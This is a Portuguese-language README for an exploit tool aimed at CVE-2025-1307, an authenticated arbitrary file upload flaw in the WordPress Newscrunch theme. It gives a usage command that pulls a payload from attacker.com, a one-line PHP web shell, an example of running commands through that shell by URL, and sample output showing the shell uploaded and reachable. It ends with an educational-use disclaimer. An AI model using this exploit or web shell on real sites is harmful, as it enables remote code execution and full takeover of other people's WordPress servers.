
Newscrunch <= 1.8.4 - Upload Arbitrário de Arquivos Autenticado (Assinante+)
Este exploit visa uma vulnerabilidade crítica (CVE-2025-1307) no tema Newscrunch do WordPress. A falha permite que usuários autenticados (Assinante e acima) façam upload de arquivos arbitrários devido à falta de verificações de permissões na função newscrunch_install_and_activate_plugin(). Isso pode levar à Execução Remota de Código (RCE), comprometendo completamente o site WordPress afetado.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HExplorabilidade: Requer uma conta WordPress válida com privilégios de Assinante ou superiores.
✅ Exploração Automatizada do CVE-2025-1307
✅ Detecção automática da versão vulnerável do tema
✅ Extração e execução automática do payload ZIP
✅ Obtém dinamicamente o nome do arquivo shell do ZIP
✅ Verifica automaticamente a disponibilidade do shell após a exploração
✅ Registro limpo e estruturado para depuração
Certifique-se de ter Python 3.x instalado e instale as dependências necessárias:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit for CVE-2025-1307 in WordPress Newscrunch Theme By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL (e.g., https://example.com)
-un USERNAME, --username USERNAME
WordPress username
-p PASSWORD, --password PASSWORD
WordPress password
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
Malicious file URL to upload
Uma vez que o shell seja carregado com sucesso, ele permite a execução remota de comandos no sistema alvo. O arquivo shell deve ser colocado dentro de um arquivo ZIP e será extraído automaticamente durante a exploração.
Certifique-se de que seu shell PHP (shell.php) esteja dentro de um arquivo ZIP. Em seguida, faça upload do arquivo ZIP usando o exploit.
<?php system($_GET['cmd']); ?>
Você pode executar comandos do sistema via navegador, anexando o parâmetro cmd à URL do shell:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
Esta ferramenta é apenas para fins educacionais e de pesquisa em segurança. A exploração não autorizada de vulnerabilidades é ilegal e punível por lei. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta. Use com responsabilidade.
Por: Nxploit | Khaled Alenazi